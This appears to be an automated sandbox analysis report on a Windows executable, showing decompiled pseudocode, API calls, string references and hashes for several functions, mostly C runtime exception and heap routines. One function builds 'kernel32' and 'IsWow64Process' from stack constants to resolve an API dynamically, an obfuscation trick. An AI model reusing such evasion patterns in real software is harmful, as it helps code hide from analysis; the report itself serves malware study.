Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Strings

_vswprintf, xrefs: 0040BEB4
printf, xrefs: 0040BF70
_vswprintf, xrefs: 0040BF39, 0040BF3C

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AddressProcVirtual$AllocFreeHandleModulelstrlen
String ID: _vswprintf$_vswprintf$printf
API String ID: 1218647650-1367835036
Opcode ID: 2c6a6b63c88347199fc3594d01106ead45b79314c5bb53e803b7b243dedb76a3
Instruction ID: add8635b878e9c8560ee4638379d42625a351b1dab05a0b8bf96f32d4566dfce
Opcode Fuzzy Hash: 2c6a6b63c88347199fc3594d01106ead45b79314c5bb53e803b7b243dedb76a3
Instruction Fuzzy Hash: 1721717191024AAADB00DFB4ED45AEF77B8EF19310F005076E905E72A0E7748A848B9D

Uniqueness

Uniqueness Score: 100.00%

Function 00410679, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 56
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 64%

			E00410679() {
				signed int _v8;
				char _v10;
				short _v12;
				char _v13;
				short _v15;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _t23;
				short _t24;
				short _t25;
				short _t26;
				short _t27;
				_Unknown_base(*)()* _t32;
				signed int _t35;
				char _t38;
				char _t39;

				_t23 = 0x6b;
				_t39 = 0x65;
				_t38 = 0x72;
				_v44 = _t23;
				_t24 = 0x6e;
				_v38 = _t24;
				_t25 = 0x6c;
				_v34 = _t25;
				_t26 = 0x33;
				_v32 = _t26;
				_t27 = 0x32;
				_v30 = _t27;
				_v28 = 0;
				_v10 = 0;
				_v42 = _t39;
				_v40 = _t38;
				_v36 = _t39;
				_v24 = 0x6f577349;
				_v20 = 0x50343677;
				_v16 = _t38;
				_v15 = 0x636f;
				_v13 = _t39;
				_v12 = 0x7373;
				_t32 = GetProcAddress(GetModuleHandleW( &_v44),  &_v24);
				 *0x419918 = _t32;
				if(_t32 != 0) {
					_v8 = _v8 & 0x00000000;
					_t35 =  *0x419918(GetCurrentProcess(),  &_v8);
					asm("sbb eax, eax");
					return  ~_t35 & _v8;
				}
				return _t32;
			}

0x00410681
0x00410684
0x00410687
0x0041068a
0x0041068e
0x00410691
0x00410695
0x00410698
0x0041069c
0x0041069d
0x004106a3
0x004106a4
0x004106aa
0x004106ad
0x004106b7
0x004106bc
0x004106c0
0x004106c4
0x004106cb
0x004106d2
0x004106d5
0x004106db
0x004106de
0x004106eb
0x004106f1
0x004106f8
0x004106fa
0x00410709
0x00410711
0x00000000
0x00410713
0x00410719

APIs

GetModuleHandleW.KERNEL32(?,?), ref: 004106E4
GetProcAddress.KERNEL32(00000000), ref: 004106EB
GetCurrentProcess.KERNEL32(00000000), ref: 00410702

Strings

w64P, xrefs: 004106CB
ss, xrefs: 004106DE
IsWo, xrefs: 004106C4
oc, xrefs: 004106D5

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWo$oc$ss$w64P
API String ID: 4190356694-3207124551
Opcode ID: 9296e6f21290c984403722139312cde075835a1939bf73f26f8a6a7f3ad6d637
Instruction ID: ad0e4376cff7c07c43c3972a5982fc1059a1e74818a07307a53272c2d995e97c
Opcode Fuzzy Hash: 9296e6f21290c984403722139312cde075835a1939bf73f26f8a6a7f3ad6d637
Instruction Fuzzy Hash: 1E116076D54349EADB00CBF4E845BEEBBB8EF18710F10546AD504EB290E3754B84CB6A

Uniqueness

Uniqueness Score: 100.00%

Function 00430C0E, Relevance: 12.3, APIs: 8, Instructions: 302fileUNIQUE

Download Yara Rule

APIs

Part of subcall function 0042151C: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0042154E

_free.LIBCMT ref: 00430D3D
_free.LIBCMT ref: 00430D44
GetConsoleMode.KERNEL32(?,00000000), ref: 00430E99
ReadConsoleW.KERNEL32(?,?,00000000,?,00000000), ref: 00430EBB
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00430EC5
_free.LIBCMT ref: 00430ED6

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00430F03

Part of subcall function 00430769: ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00430843

Part of subcall function 00430930: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,7FFFFFFF), ref: 00430A4D

GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00430F67

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorLast$Read_free$ConsoleFileHeap$AllocateFreeMode
String ID:
API String ID: 4044260037-0
Opcode ID: 6f06ff8c1238a46a0f6b6a8374545f6602e072c8ea598590c6c9b52a0ba1f010
Instruction ID: a1dfd01de9d7cfac9b6dd516b5f11afb24217e0221ba4ae7d62c87e1456730b8
Opcode Fuzzy Hash: 6f06ff8c1238a46a0f6b6a8374545f6602e072c8ea598590c6c9b52a0ba1f010
Instruction Fuzzy Hash: 06C10770E04209AFDB25DFA9C8A1BAE7BB0AF4D304F14525AF40597392C7789D42CB6D

Uniqueness

Uniqueness Score: 100.00%

Function 00424976, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 265UNIQUE

Download Yara Rule

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(?,?,?,0041B27E), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,0041B27E), ref: 00425252

Part of subcall function 0042151C: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0042154E

Part of subcall function 0042A148: GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 0042A218

_free.LIBCMT ref: 00424C83
_free.LIBCMT ref: 00424C9C
_free.LIBCMT ref: 00424CDC

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

_free.LIBCMT ref: 00424CE5
_free.LIBCMT ref: 00424CF1

Strings

C, xrefs: 00424AD2

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$ErrorLast$Heap$AllocateFreeStringType
String ID: C
API String ID: 3608156950-1037565863
Opcode ID: 9c827e9a91b7d86e4ab1c2382bcaf7c62f2440ffcc242126a32eccc7b04c02a3
Instruction ID: b4a8f7c5f8082aa1a2ed5b16bb8f100b9d9098e73feff67dff0fbc50e3e306bb
Opcode Fuzzy Hash: 9c827e9a91b7d86e4ab1c2382bcaf7c62f2440ffcc242126a32eccc7b04c02a3
Instruction Fuzzy Hash: F2B14C75A012299BDB24DF19D884BAEB7B4FF58304F5045EEE809A7350D774AE90CF48

Uniqueness

Uniqueness Score: 37.75%

Function 004244ED, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188UNIQUE

Download Yara Rule

Strings

h;B, xrefs: 00424953

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID: h;B
API String ID: 3033488037-501582862
Opcode ID: 263963484e064a31d5cf99d0958e763fb2d7916dd59798c0394d419003734e8c
Instruction ID: 3e11c5c72805cf1d559b7d4fdbe9c0aa39670d5adbe5865a525c433b8de29691
Opcode Fuzzy Hash: 263963484e064a31d5cf99d0958e763fb2d7916dd59798c0394d419003734e8c
Instruction Fuzzy Hash: AE510371B00214AFDB20DF69E881B6A77F4EF99724F50456FE809D7250E739D941CB88

Uniqueness

Uniqueness Score: 100.00%

Function 00417E95, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 105
UNIQUE

Download Yara Rule

C-Code - Quality: 54%

			E00417E95(intOrPtr __eax, void* __ebx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr* _v60;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t73;
				void* _t74;
				intOrPtr* _t77;
				intOrPtr* _t81;
				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr* _t90;
				intOrPtr* _t92;
				signed int _t96;
				intOrPtr _t101;
				void* _t103;
				char _t104;
				void* _t108;
				intOrPtr _t114;
				char _t117;
				intOrPtr _t119;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr _t132;
				void* _t133;
				intOrPtr* _t134;
				void* _t135;
				signed int* _t139;
				void* _t141;
				void* _t143;
				void* _t147;
				void* _t149;
				void* _t151;
				void* _t167;

				_t116 = __edx;
				_t73 = __eax;
				 *((intOrPtr*)(__ebx + 0x77ff10c4)) =  *((intOrPtr*)(__ebx + 0x77ff10c4)) + _t73;
				asm("sbb al, 0xe8");
				0x8b55();
				_t141 = _t147;
				_push(_t108);
				_push(_t108);
				_t122 = _a4;
				_t153 =  *_t122 - 0x80000003;
				if( *_t122 == 0x80000003) {
					L19:
					return _t73;
				} else {
					_t74 = E0041A1F6(__ebx, _t108, __edx, _t133, _t153, _t167, _t133, __ebx);
					_t101 = _a20;
					_t154 =  *((intOrPtr*)(_t74 + 8));
					if( *((intOrPtr*)(_t74 + 8)) == 0) {
						L7:
						if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
							E00424D7B(_t101, _t108, _t116, __eflags, _t167);
							asm("int3");
							_push(_t141);
							_t143 = _t147;
							_t149 = _t147 - 0x18;
							_push(_t101);
							_push(_t133);
							_t134 = _v16;
							_push(_t122);
							__eflags = _t134;
							if(__eflags == 0) {
								E00424D7B(_t101, _t108, _t116, __eflags, _t167);
								asm("int3");
								_push(_t143);
								_push(_t101);
								_push(_t134);
								_push(_t122);
								_t124 = _v60;
								_t135 = 0;
								__eflags =  *_t124;
								if( *_t124 <= 0) {
									L38:
									_t77 = 0;
									__eflags = 0;
								} else {
									_t103 = 0;
									while(1) {
										_t81 = E0041A181( *((intOrPtr*)(_t103 +  *((intOrPtr*)(_t124 + 4)) + 4)) + 4, 0x44c744);
										__eflags = _t81;
										if(_t81 == 0) {
											break;
										}
										_t135 = _t135 + 1;
										_t103 = _t103 + 0x10;
										__eflags = _t135 -  *_t124;
										if(_t135 <  *_t124) {
											continue;
										} else {
											goto L38;
										}
										goto L39;
									}
									_t77 = 1;
								}
								L39:
								return _t77;
							} else {
								_t126 =  *_t134;
								_t104 = 0;
								__eflags = _t126;
								if(_t126 > 0) {
									_t117 = 0;
									_v12 = 0;
									_t85 =  *((intOrPtr*)( *((intOrPtr*)(_v0 + 0x1c)) + 0xc));
									_t86 = _t85 + 4;
									__eflags = _t86;
									_v24 =  *_t85;
									_v32 = _t86;
									do {
										_t112 = _t86;
										_t87 = _v24;
										_v20 = _t86;
										_v16 = _t87;
										__eflags = _t87;
										if(_t87 > 0) {
											_t89 =  *((intOrPtr*)(_t134 + 4)) + _t117;
											__eflags = _t89;
											_v28 = _t89;
											while(1) {
												_t90 = E0041848C(_t89,  *_t112,  *((intOrPtr*)(_v0 + 0x1c)));
												_t149 = _t149 + 0xc;
												__eflags = _t90;
												if(_t90 != 0) {
													break;
												}
												_t92 = _v16 - 1;
												_t112 = _v20 + 4;
												_v16 = _t92;
												__eflags = _t92;
												_v20 = _v20 + 4;
												_t89 = _v28;
												if(_t92 > 0) {
													continue;
												} else {
												}
												L30:
												_t117 = _v12;
												goto L31;
											}
											_t104 = 1;
											goto L30;
										}
										L31:
										_t86 = _v32;
										_t117 = _t117 + 0x10;
										_v12 = _t117;
										_t126 = _t126 - 1;
										__eflags = _t126;
									} while (_t126 != 0);
								}
								return _t104;
							}
						} else {
							_t73 = E00416E38(_t108, _t101, _a28, _a24,  &_v12,  &_v8);
							_t114 = _v12;
							_t151 = _t147 + 0x14;
							_t119 = _v8;
							if(_t114 < _t119) {
								_t19 = _t73 + 0xc; // 0xc
								_t139 = _t19;
								_t73 = _a24;
								do {
									if(_t73 >=  *((intOrPtr*)(_t139 - 0xc)) && _t73 <=  *((intOrPtr*)(_t139 - 8))) {
										_t96 =  *_t139 << 4;
										if( *((intOrPtr*)(_t139[1] + _t96 - 0xc)) == 0) {
											L14:
											_t97 = _t96 + _t139[1] + 0xfffffff0;
											_t132 = _a4;
											if(( *(_t96 + _t139[1] + 0xfffffff0) & 0x00000040) == 0) {
												_push(1);
												_t37 = _t139 - 0xc; // 0x0
												E00417A77(_t101, _t119, _t132, _a8, _a12, _a16, _t101, _t97, 0, _t37, _a28, _a32);
												_t119 = _v8;
												_t151 = _t151 + 0x2c;
												_t114 = _v12;
											}
										} else {
											_t119 = _v8;
											_t101 = _a20;
											if( *((char*)( *((intOrPtr*)(_t139[1] + _t96 - 0xc)) + 8)) == 0) {
												goto L14;
											}
										}
										_t73 = _a24;
									}
									_t114 = _t114 + 1;
									_t139 =  &(_t139[5]);
									_v12 = _t114;
								} while (_t114 < _t119);
							}
							goto L18;
						}
					} else {
						__imp__EncodePointer(0);
						_t133 = _t74;
						if( *((intOrPtr*)(E0041A1F6(_t101, _t108, __edx, _t133, _t154, _t167) + 8)) == _t133 ||  *_t122 == 0xe0434f4d ||  *_t122 == 0xe0434352) {
							goto L7;
						} else {
							_t73 = E00416D5B(_t122, _a8, _a12, _a16, _t101, _a28, _a32);
							_t147 = _t147 + 0x1c;
							if(_t73 != 0) {
								L18:
								goto L19;
							} else {
								goto L7;
							}
						}
					}
				}
			}

0x00417e95
0x00417e95
0x00417e97
0x00417e9d
0x00417e9f
0x00417ea5
0x00417ea7
0x00417ea8
0x00417eaa
0x00417ead
0x00417eb3
0x00417fb4
0x00417fb8
0x00417eb9
0x00417ebb
0x00417ec0
0x00417ec3
0x00417ec7
0x00417f0e
0x00417f12
0x00417fb9
0x00417fbe
0x00417fbf
0x00417fc0
0x00417fc2
0x00417fc5
0x00417fc6
0x00417fc7
0x00417fca
0x00417fcb
0x00417fcd
0x00418055
0x0041805a
0x0041805b
0x0041805e
0x0041805f
0x00418060
0x00418061
0x00418064
0x00418066
0x00418068
0x0041808f
0x0041808f
0x0041808f
0x0041806a
0x0041806a
0x0041806c
0x0041807c
0x00418083
0x00418085
0x00000000
0x00000000
0x00418087
0x00418088
0x0041808b
0x0041808d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041808d
0x00418096
0x00418096
0x00418091
0x00418095
0x00417fd3
0x00417fd3
0x00417fd5
0x00417fd7
0x00417fd9
0x00417fde
0x00417fe0
0x00417fe6
0x00417feb
0x00417feb
0x00417fee
0x00417ff1
0x00417ff4
0x00417ff4
0x00417ff6
0x00417ff9
0x00417ffc
0x00417fff
0x00418001
0x00418006
0x00418006
0x00418008
0x0041800b
0x00418014
0x00418019
0x0041801c
0x0041801e
0x00000000
0x00000000
0x00418026
0x00418027
0x0041802a
0x0041802d
0x0041802f
0x00418032
0x00418035
0x00000000
0x00000000
0x00418037
0x0041803b
0x0041803b
0x00000000
0x0041803b
0x00418039
0x00000000
0x00418039
0x0041803e
0x0041803e
0x00418041
0x00418044
0x00418047
0x00418047
0x00418047
0x00417ff4
0x00418054
0x00418054
0x00417f18
0x00417f27
0x00417f2c
0x00417f2f
0x00417f32
0x00417f37
0x00417f39
0x00417f39
0x00417f3c
0x00417f3f
0x00417f42
0x00417f4e
0x00417f57
0x00417f6c
0x00417f72
0x00417f74
0x00417f7a
0x00417f7c
0x00417f81
0x00417f96
0x00417f9b
0x00417f9e
0x00417fa1
0x00417fa1
0x00417f59
0x00417f60
0x00417f67
0x00417f6a
0x00000000
0x00000000
0x00417f6a
0x00417fa4
0x00417fa4
0x00417fa7
0x00417fa8
0x00417fab
0x00417fae
0x00417f3f
0x00000000
0x00417f37
0x00417ec9
0x00417ecb
0x00417ed1
0x00417edb
0x00000000
0x00417eed
0x00417efe
0x00417f03
0x00417f08
0x00417fb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f08
0x00417edb
0x00417ec7

APIs

Part of subcall function 0041A1F6: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00421586

EncodePointer.KERNEL32(00000000,00000000,?,?,?,?,?,?,004480C4,19930522,00000000,1FFFFFFF), ref: 00417ECB
_CallSETranslator.LIBVCRUNTIME ref: 00417EFE
_GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 00417F27

Part of subcall function 00417A77: ___BuildCatchObject.LIBVCRUNTIME ref: 00417A8E
Part of subcall function 00417A77: _UnwindNestedFrames.LIBCMT ref: 00417AA5
Part of subcall function 00417A77: ___FrameUnwindToState.LIBVCRUNTIME ref: 00417AB7
Part of subcall function 00417A77: CallCatchBlock.LIBVCRUNTIME ref: 00417ADB

Strings

6#, xrefs: 00417EBB
RCC, xrefs: 00417EE5
MOC, xrefs: 00417EDD

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: CallCatchUnwind$BlockBuildCheckEncodeFeatureFrameFramesNestedObjectPointerPresentProcessorRangeStateTranslatorTrys
String ID: MOC$RCC$6#
API String ID: 2777873329-3886700537
Opcode ID: 0bed42b7e2b69944a78ffadc05bd5548a17d4b16bf69c58fa06b67f3e0c7c50c
Instruction ID: fe3b0c9be7e21574b46b87598af560cfc3e793169dd597663a41a0a57b7eebc2
Opcode Fuzzy Hash: 0bed42b7e2b69944a78ffadc05bd5548a17d4b16bf69c58fa06b67f3e0c7c50c
Instruction Fuzzy Hash: 2C414932504149AFDF12CF54C981AEBB7B6EF48318F29818AF91457251C339EDA2CB58

Uniqueness

Uniqueness Score: 100.00%

Function 00417EA4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104
UNIQUE

Download Yara Rule

C-Code - Quality: 65%

			E00417EA4(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr* _v60;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				void* _t71;
				intOrPtr* _t74;
				intOrPtr* _t78;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				signed int _t93;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				char _t101;
				void* _t105;
				intOrPtr _t111;
				char _t114;
				intOrPtr _t116;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr _t129;
				void* _t130;
				intOrPtr* _t131;
				void* _t132;
				signed int* _t136;
				void* _t138;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t157;

				_t113 = __edx;
				_push(_t105);
				_push(_t105);
				_t119 = _a4;
				_t143 =  *_t119 - 0x80000003;
				if( *_t119 == 0x80000003) {
					L18:
					return _t70;
				} else {
					_t71 = E0041A1F6(_t97, _t105, __edx, _t130, _t143, _t157, _t130, _t97);
					_t98 = _a20;
					_t144 =  *((intOrPtr*)(_t71 + 8));
					if( *((intOrPtr*)(_t71 + 8)) == 0) {
						L6:
						if( *((intOrPtr*)(_t98 + 0xc)) == 0) {
							E00424D7B(_t98, _t105, _t113, __eflags, _t157);
							asm("int3");
							_t138 = _t140;
							_t141 = _t140 - 0x18;
							_push(_t98);
							_push(_t130);
							_t131 = _v16;
							_push(_t119);
							__eflags = _t131;
							if(__eflags == 0) {
								E00424D7B(_t98, _t105, _t113, __eflags, _t157);
								asm("int3");
								_push(_t138);
								_push(_t98);
								_push(_t131);
								_push(_t119);
								_t121 = _v60;
								_t132 = 0;
								__eflags =  *_t121;
								if( *_t121 <= 0) {
									L37:
									_t74 = 0;
									__eflags = 0;
								} else {
									_t100 = 0;
									while(1) {
										_t78 = E0041A181( *((intOrPtr*)(_t100 +  *((intOrPtr*)(_t121 + 4)) + 4)) + 4, 0x44c744);
										__eflags = _t78;
										if(_t78 == 0) {
											break;
										}
										_t132 = _t132 + 1;
										_t100 = _t100 + 0x10;
										__eflags = _t132 -  *_t121;
										if(_t132 <  *_t121) {
											continue;
										} else {
											goto L37;
										}
										goto L38;
									}
									_t74 = 1;
								}
								L38:
								return _t74;
							} else {
								_t123 =  *_t131;
								_t101 = 0;
								__eflags = _t123;
								if(_t123 > 0) {
									_t114 = 0;
									_v12 = 0;
									_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v0 + 0x1c)) + 0xc));
									_t83 = _t82 + 4;
									__eflags = _t83;
									_v24 =  *_t82;
									_v32 = _t83;
									do {
										_t109 = _t83;
										_t84 = _v24;
										_v20 = _t83;
										_v16 = _t84;
										__eflags = _t84;
										if(_t84 > 0) {
											_t86 =  *((intOrPtr*)(_t131 + 4)) + _t114;
											__eflags = _t86;
											_v28 = _t86;
											while(1) {
												_t87 = E0041848C(_t86,  *_t109,  *((intOrPtr*)(_v0 + 0x1c)));
												_t141 = _t141 + 0xc;
												__eflags = _t87;
												if(_t87 != 0) {
													break;
												}
												_t89 = _v16 - 1;
												_t109 = _v20 + 4;
												_v16 = _t89;
												__eflags = _t89;
												_v20 = _v20 + 4;
												_t86 = _v28;
												if(_t89 > 0) {
													continue;
												} else {
												}
												L29:
												_t114 = _v12;
												goto L30;
											}
											_t101 = 1;
											goto L29;
										}
										L30:
										_t83 = _v32;
										_t114 = _t114 + 0x10;
										_v12 = _t114;
										_t123 = _t123 - 1;
										__eflags = _t123;
									} while (_t123 != 0);
								}
								return _t101;
							}
						} else {
							_t70 = E00416E38(_t105, _t98, _a28, _a24,  &_v12,  &_v8);
							_t111 = _v12;
							_t142 = _t140 + 0x14;
							_t116 = _v8;
							if(_t111 < _t116) {
								_t17 = _t70 + 0xc; // 0xc
								_t136 = _t17;
								_t70 = _a24;
								do {
									if(_t70 >=  *((intOrPtr*)(_t136 - 0xc)) && _t70 <=  *((intOrPtr*)(_t136 - 8))) {
										_t93 =  *_t136 << 4;
										if( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) == 0) {
											L13:
											_t94 = _t93 + _t136[1] + 0xfffffff0;
											_t129 = _a4;
											if(( *(_t93 + _t136[1] + 0xfffffff0) & 0x00000040) == 0) {
												_push(1);
												_t35 = _t136 - 0xc; // 0x0
												E00417A77(_t98, _t116, _t129, _a8, _a12, _a16, _t98, _t94, 0, _t35, _a28, _a32);
												_t116 = _v8;
												_t142 = _t142 + 0x2c;
												_t111 = _v12;
											}
										} else {
											_t116 = _v8;
											_t98 = _a20;
											if( *((char*)( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) + 8)) == 0) {
												goto L13;
											}
										}
										_t70 = _a24;
									}
									_t111 = _t111 + 1;
									_t136 =  &(_t136[5]);
									_v12 = _t111;
								} while (_t111 < _t116);
							}
							goto L17;
						}
					} else {
						__imp__EncodePointer(0);
						_t130 = _t71;
						if( *((intOrPtr*)(E0041A1F6(_t98, _t105, __edx, _t130, _t144, _t157) + 8)) == _t130 ||  *_t119 == 0xe0434f4d ||  *_t119 == 0xe0434352) {
							goto L6;
						} else {
							_t70 = E00416D5B(_t119, _a8, _a12, _a16, _t98, _a28, _a32);
							_t140 = _t140 + 0x1c;
							if(_t70 != 0) {
								L17:
								goto L18;
							} else {
								goto L6;
							}
						}
					}
				}
			}

0x00417ea4
0x00417ea7
0x00417ea8
0x00417eaa
0x00417ead
0x00417eb3
0x00417fb4
0x00417fb8
0x00417eb9
0x00417ebb
0x00417ec0
0x00417ec3
0x00417ec7
0x00417f0e
0x00417f12
0x00417fb9
0x00417fbe
0x00417fc0
0x00417fc2
0x00417fc5
0x00417fc6
0x00417fc7
0x00417fca
0x00417fcb
0x00417fcd
0x00418055
0x0041805a
0x0041805b
0x0041805e
0x0041805f
0x00418060
0x00418061
0x00418064
0x00418066
0x00418068
0x0041808f
0x0041808f
0x0041808f
0x0041806a
0x0041806a
0x0041806c
0x0041807c
0x00418083
0x00418085
0x00000000
0x00000000
0x00418087
0x00418088
0x0041808b
0x0041808d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041808d
0x00418096
0x00418096
0x00418091
0x00418095
0x00417fd3
0x00417fd3
0x00417fd5
0x00417fd7
0x00417fd9
0x00417fde
0x00417fe0
0x00417fe6
0x00417feb
0x00417feb
0x00417fee
0x00417ff1
0x00417ff4
0x00417ff4
0x00417ff6
0x00417ff9
0x00417ffc
0x00417fff
0x00418001
0x00418006
0x00418006
0x00418008
0x0041800b
0x00418014
0x00418019
0x0041801c
0x0041801e
0x00000000
0x00000000
0x00418026
0x00418027
0x0041802a
0x0041802d
0x0041802f
0x00418032
0x00418035
0x00000000
0x00000000
0x00418037
0x0041803b
0x0041803b
0x00000000
0x0041803b
0x00418039
0x00000000
0x00418039
0x0041803e
0x0041803e
0x00418041
0x00418044
0x00418047
0x00418047
0x00418047
0x00417ff4
0x00418054
0x00418054
0x00417f18
0x00417f27
0x00417f2c
0x00417f2f
0x00417f32
0x00417f37
0x00417f39
0x00417f39
0x00417f3c
0x00417f3f
0x00417f42
0x00417f4e
0x00417f57
0x00417f6c
0x00417f72
0x00417f74
0x00417f7a
0x00417f7c
0x00417f81
0x00417f96
0x00417f9b
0x00417f9e
0x00417fa1
0x00417fa1
0x00417f59
0x00417f60
0x00417f67
0x00417f6a
0x00000000
0x00000000
0x00417f6a
0x00417fa4
0x00417fa4
0x00417fa7
0x00417fa8
0x00417fab
0x00417fae
0x00417f3f
0x00000000
0x00417f37
0x00417ec9
0x00417ecb
0x00417ed1
0x00417edb
0x00000000
0x00417eed
0x00417efe
0x00417f03
0x00417f08
0x00417fb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f08
0x00417edb
0x00417ec7

APIs

Part of subcall function 0041A1F6: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00421586

EncodePointer.KERNEL32(00000000,00000000,?,?,?,?,?,?,004480C4,19930522,00000000,1FFFFFFF), ref: 00417ECB
_CallSETranslator.LIBVCRUNTIME ref: 00417EFE
_GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 00417F27

Part of subcall function 00417A77: ___BuildCatchObject.LIBVCRUNTIME ref: 00417A8E
Part of subcall function 00417A77: _UnwindNestedFrames.LIBCMT ref: 00417AA5
Part of subcall function 00417A77: ___FrameUnwindToState.LIBVCRUNTIME ref: 00417AB7
Part of subcall function 00417A77: CallCatchBlock.LIBVCRUNTIME ref: 00417ADB

Strings

6#, xrefs: 00417EBB
RCC, xrefs: 00417EE5
MOC, xrefs: 00417EDD

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: CallCatchUnwind$BlockBuildCheckEncodeFeatureFrameFramesNestedObjectPointerPresentProcessorRangeStateTranslatorTrys
String ID: MOC$RCC$6#
API String ID: 2777873329-3886700537
Opcode ID: 6c9075ca2bc94ed230f3b19b8c4c081f7618326b92c1a1bba932a8ac80a4fd77
Instruction ID: accc6be44762a810354ebb75388ca5f7f9e3566a0005bfde8a5ba7711fd65f59
Opcode Fuzzy Hash: 6c9075ca2bc94ed230f3b19b8c4c081f7618326b92c1a1bba932a8ac80a4fd77
Instruction Fuzzy Hash: 7F414732504149AFDF12CF44C981EEBB7B6EF48318F29815AF90457251D339EDA2CBA8

